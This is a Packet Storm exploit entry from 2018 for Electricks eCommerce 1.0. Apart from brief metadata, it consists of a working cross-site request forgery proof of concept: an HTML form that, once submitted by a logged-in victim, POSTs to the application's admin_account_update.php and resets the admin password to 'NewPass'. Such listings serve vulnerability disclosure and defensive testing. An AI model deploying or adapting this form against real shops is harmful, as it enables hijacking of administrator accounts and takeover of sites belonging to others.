Electricks eCommerce 1.0 Cross Site Request Forgery

2018-11-15T00:00:00
ID PACKETSTORM:150338
Type packetstorm
Reporter Nawaf Alkeraithe
Modified 2018-11-15T00:00:00

Description

                                        
                                            `# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)  
# Date: 2018-11-12  
# Exploit Author: Nawaf Alkeraithe  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip  
# Version: 1.0  
  
#PoC:  
  
i>>?<html><form enctype="application/x-www-form-urlencoded" method="POST"  
action="  
http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input  
type="text" value="4" name="user_id"></td></tr>  
<tr><td>firstname</td><td><input type="text" value="admin"  
name="firstname"></td></tr>  
<tr><td>lastname</td><td><input type="text" value="admin"  
name="lastname"></td></tr>  
<tr><td>email</td><td><input type="text" value="admin@admin.com"  
name="email"></td></tr>  
<tr><td>username</td><td><input type="text" value="admin"  
name="username"></td></tr>  
<tr><td>password</td><td><input type="text" value="NewPass"  
name="password"></td></tr>  
<tr><td>update</td><td><input type="text" value="" name="update"></td></tr>  
</table><input type="submit" value="Change Admin Password"></form></html>  
  
  
`